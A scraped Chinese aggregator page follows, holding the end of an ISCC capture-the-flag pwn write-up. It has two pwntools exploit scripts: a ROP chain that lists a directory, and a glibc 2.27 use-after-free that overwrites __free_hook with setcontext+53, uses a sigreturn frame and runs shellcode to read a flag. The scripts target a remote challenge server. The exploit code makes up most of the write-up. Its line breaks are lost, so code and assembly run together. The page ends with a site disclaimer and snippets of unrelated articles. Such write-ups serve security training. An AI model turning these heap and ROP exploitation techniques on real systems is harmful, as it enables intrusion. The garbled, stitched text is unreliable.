orw1 = flat([pop_rdi, stack+0xc8, pop_rsi,0, pop_rdx,0,0, pop_rax,2, syscall,  # openpop_rdi, 3, pop_rsi, 0x100080, pop_rdx,0x400,0, pop_rax,0x4e, syscall,  # getdents64pop_rdi, 1, pop_rax,1, syscall # write
]) + b'.\x00'debug(0, orw)#gdb.attach(p)
p.interactive()#ISCC{DoKPWB4BnBZ5Afjmst5brJvr4SHvm74HMhVF}

unheap

libc-2.27 UAF 写__free_hook setcontext+53 再写shellcode

from pwn import *context(arch='amd64', log_level='debug')
libc = ELF('/home/kali/glibc/libs/2.27-3ubuntu1.5_amd64/libc-2.27.so')
#elf = ELF('./unheap')#p = process('./unheap')
p = remote('182.92.237.102', 10030)def add(size, msg=b'A'):p.sendlineafter(b">> ", b'1')p.sendlineafter(b"[*] Note data size: ", str(size).encode())p.sendafter(b"[*] Note content: ", msg)def free(idx):p.sendlineafter(b">> ", b'2')p.sendlineafter(b"[*] Note index: ", str(idx).encode())def edit(idx, msg):p.sendlineafter(b">> ", b'3')p.sendlineafter(b'[+] Note index: ', str(idx).encode())p.sendafter(b"[*] Note data: ", msg)def show(idx):p.sendlineafter(b">> ", b'4')p.sendlineafter(b"[*] Note index: ", str(idx).encode())#heap = 0x280 libc-2.27 ?
for i in range(8):add(0x80)add(0x28)
add(0x28)
for i in range(8):free(i)show(7) #ca0
p.recvuntil(b': ')
libc.address = u64(p.recv(6)+b'\0\0') - 0x60 - 0x10 - libc.sym['__malloc_hook'] #libc.sym['main_arena']
print(f"{libc.address = :x}")#
syscall = next(libc.search(asm("syscall\nret"))) 
free_hook = libc.sym['__free_hook']
#
frame = SigreturnFrame()
frame.rax=0 # read
frame.rdi=0 # argv fd
frame.rsi=free_hook&0xfffffffffffff000 #argv ptr
frame.rdx=0x200                        #argv size
frame.rsp=free_hook&0xfffffffffffff000 #retrun
frame.rip=syscall                     #calladd(0x100, flat(frame)) #10free(8)
free(9)
edit(9, p64(libc.sym['__free_hook']))add(0x28) #11
add(0x28, p64(libc.sym['setcontext']+53))  #__free_hook -> setcontext+53free(10)  #layout = [libc.address + 0x000000000002164f , free_hook & 0xfffffffffffff000,libc.address + 0x0000000000023a6a , 0x2000,libc.address + 0x0000000000001b96 , 7,libc.address + 0x000000000001b500 , 10,syscall, #: syscall; ret;next(libc.search(asm("jmp rsp"))), #: jmp rsp;
]shellcode = asm('''
sub rsp, 0x800
push 0
mov rax, 0x7478742e67616c66
push rax
mov rdi, rsp
xor esi, esi
mov eax, 2
syscallcmp eax, 0
js failedmov edi, eax
mov rsi, rsp
mov edx, 0x100
xor eax, eax
syscallmov edx, eax
mov rsi, rsp
mov edi, 1
mov eax, edi
syscalljmp exitfailed:
push 0x6c696166
mov edi, 1
mov rsi, rsp
mov edx, 4
mov eax, edi
syscallexit:
xor edi, edi
mov eax, 231
syscall
''')
p.sendline(flat(layout) + shellcode)#gdb.attach(p)
#pause()
p.interactive()
#ISCC{BdjoU07jthSphGMZ6Bn58l5sIEtOSAa44kEh}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_1053602.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

[杂项]优化AMD显卡对DX9游戏(天谕)的支持

目录 关键词平台说明背景RDNA 1、2、3 架构的显卡支持游戏一、 优化方法1.1 下载 二、 举个栗子&#xff08;以《天谕》为例&#xff09;2.1 下载微星 afterburner 软件 查看游戏内信息&#xff08;可跳过&#xff09;2.2 查看D3D9 帧数2.3 关闭游戏&#xff0c;替换 dll 文件2…

PHP开发入门

PHP官网&#xff1a;PHP: Hypertext Preprocessor apache官网&#xff1a;https://httpd.apache.org/ 一、搭建PHP环境 下载apache 进入官网点击download 选择下载windows版本文件 点击进入下载界面 点击下载64位版本文件 下载后解压文件 解压文件后进入 D:\httpd-2.4.59-24…

电脑卸载linux安装windows后每次开机都出现grub

原因分析 这是因为电脑硬盘中还存在linux系统的引导程序&#xff0c;并且启动顺序还在windows之前&#xff0c;有时候通过bios根本找不到它的存在&#xff0c;以至于每次windows开机出现grub之后都要输入exit退出linux的引导之后才能使得电脑进入windows&#xff0c;这个有时会…

【测评】香橙派 AIpro上手初体验

AI毋庸置疑是近年来&#xff0c;热度最高的技术之一&#xff0c;作为一名工程师拥抱新技术的同时不可或缺的需要一块强悍的开发板&#xff0c;香橙派 AIpro除了拥有好看的皮囊之外&#xff0c;还拥有一个有趣且充满魅力的灵魂。作为一位长期活跃在嵌入式开发领域的工程师&#…

《当微服务遇上Ribbon:一场负载均衡的华丽舞会》

在微服务的厨房里&#xff0c;如何确保每一道服务都恰到好处&#xff1f;揭秘Spring Cloud Ribbon如何像大厨一样精心调配资源&#xff0c;让负载均衡变得像烹饪艺术一样简单&#xff01; 文章目录 Spring Cloud Ribbon 详解1. 引言微服务架构中的负载均衡需求Spring Cloud Rib…

jmeter服务器性能监控分析工具ServerAgent教程

ServerAgent介绍&#xff1a;支持监控CPU&#xff0c;memory&#xff0c;磁盘&#xff0c;网络等&#xff0c;和JMeter集成&#xff0c;在JMeter的图形界面中&#xff0c;可以实时看到监控的数据&#xff0c;但是&#xff0c;它只能监控硬件资源使用情况。 不能监控应用服务 S…

LLM提示工程的技巧

1. 从简单开始&#xff08;Start Simple&#xff09; 避免在一开始就增加太多的复杂性。 从简单的提示开始&#xff0c;然后在后续提示中添加更多信息和上下文。 这样&#xff0c;提示就是一个迭代过程&#xff0c;提示在此过程中进一步发展。 从简单的开始&#xff0c;就有足…

小红书推流机制底层逻辑

小红书推流机制底层逻辑 很多做运营的朋友问小红薯怎么玩❓ 小红书的核心逻辑流量是不是玄学❓ 今天就来说说小红书的流量算法机制&#x1f525; ①电脑审核 ②分配初始流量 ③增加流量 ④推荐结束

[Android]联系人-删除修改

界面显示 添加按钮点击&#xff0c;holder.imgDelete.setlog();具体代码 public MyViewHolder onCreateViewHolder(NonNull ViewGroup parent, int viewType) {//映射布局文件&#xff0c;生成相应的组件View v LayoutInflater.from(parent.getContext()).inflate(R.layout.d…

Leetcode—2769. 找出最大的可达成数字【简单】

2024每日刷题&#xff08;139&#xff09; Leetcode—2769. 找出最大的可达成数字 实现代码 class Solution { public:int theMaximumAchievableX(int num, int t) {return num t * 2;} };运行结果 之后我会持续更新&#xff0c;如果喜欢我的文章&#xff0c;请记得一键三连…

SwiftUI中EnvironmentObject的使用(多界面共享数据)

SwiftUI的EnvironmentObject是一个强大的工具&#xff0c;它允许你在多个视图之间共享数据(使用一个可观察对象)。当你有一个复杂的视图层次结构&#xff0c;并且需要在没有直接连接的视图之间共享相同的可观察对象时&#xff0c;它特别有用。 我们之前传递数据主要是通过init…

方正畅享全媒体新闻采编系统 binary.do SQL注入漏洞复现

0x01 产品简介 方正畅享全媒体新闻生产系统是以内容资产为核心的智能化融合媒体业务平台,融合了报、网、端、微、自媒体分发平台等全渠道内容。该平台由协调指挥调度、数据资源聚合、融合生产、全渠道发布、智能传播分析、融合考核等多个平台组成,贯穿新闻生产策、采、编、发…

Kubernetes核心组件Ingress详解

1.1 Ingress介绍 Kubernetes 集群中&#xff0c;服务&#xff08;Service&#xff09;是一种抽象&#xff0c;它定义了一种访问 Pod 的方式&#xff0c;无论这些 Pod 如何变化&#xff0c;服务都保持不变。服务可以被映射到一个静态的 IP 地址&#xff08;ClusterIP&#xff09…

分类内按规则拆分一行变多行

Excel的A列是分类列&#xff0c;B列是由">"连接起来的多个字符串&#xff0c;可以看成是合并后的明细&#xff1a; AB1IDRule: Condition2470210642217Test3470251569449Doors & Hardware > Door Jambs> 119mm4470251602217Bathroom > Stone Tops &…

python爬虫之pandas库——数据清洗

安装pandas库 pip install pandas pandas库操作文件 已知在本地桌面有一名为Python开发岗位的csv文件(如果是excel文件可以做简单修改即可&#xff0c;道理是通用的) 打开文件&#xff1a; 打开文件并查看文件内容 from pandas import DataFrame import pandas as pd data_c…

使用ssh连接ubuntu

一、下载连接工具 常见的连接工具右fianlshell、xshell等等。在本文章中使用的finalshell&#xff0c;工具可以去官网上下载&#xff0c;官网下载。 二、Ubuntu中配置shh 1、使用下面指令更新软件包&#xff08;常用于下载安装或更新软件时使用&#xff0c;更新到最新的安装…

音视频开发9 FFmpeg 解复用框架说明,重要API说明

一&#xff0c;播放器框架 二 常用音视频术语 容器&#xff0f;文件&#xff08;Conainer/File&#xff09;&#xff1a; 即特定格式的多媒体文件&#xff0c; 比如mp4、flv、mkv等。 媒体流&#xff08;Stream&#xff09;&#xff1a; 表示时间轴上的一段连续数据&#xff0…

【计算机毕业设计】基于SSM+Vue的线上旅行信息管理系统【源码+lw+部署文档】

目录 摘 要 第1章 绪论 1.1背景及意义 1.2 国内外研究概况 1.3 研究的内容 第2章 相关技术 2.1 Java简介 2.2 SSM三大框架 2.3 MyEclipse开发环境 2.4 Tomcat服务器 2.5 MySQL数据库 第3章 系统分析 3.1 需求分析 3.2 系统可行性分析 3.2.1技术可行性&#xff1a;技术背景 …

讯方·智汇云校助力多所高校斩获华为ICT大赛2023-2024全球总决赛佳绩

2024年5月26日&#xff0c;华为ICT大赛2023-2024全球总决赛闭幕式暨颁奖典礼在深圳举行。讯方技术14所合作院校的18支队伍在此次大赛中荣获系列大奖。 本届大赛为华为历届最大规模的线下比赛&#xff0c;共吸引了全球80多个国家和地区、2000多所院校、17万余名学生报名参赛&am…

MySQL进阶之(九)数据库的设计规范

九、数据库的设计规范 9.1 范式的概念9.1.1 范式概述9.1.2 键和相关属性 9.2 常见的范式9.2.1 第一范式9.2.2 第二范式9.2.3 第三范式9.2.4 第四范式9.2.5 第五范式&#xff08;域键范式&#xff09; 9.3 反范式化9.3.1 概述9.3.2 举例9.3.3 反范式化新问题9.3.4 通用场景 9.4 …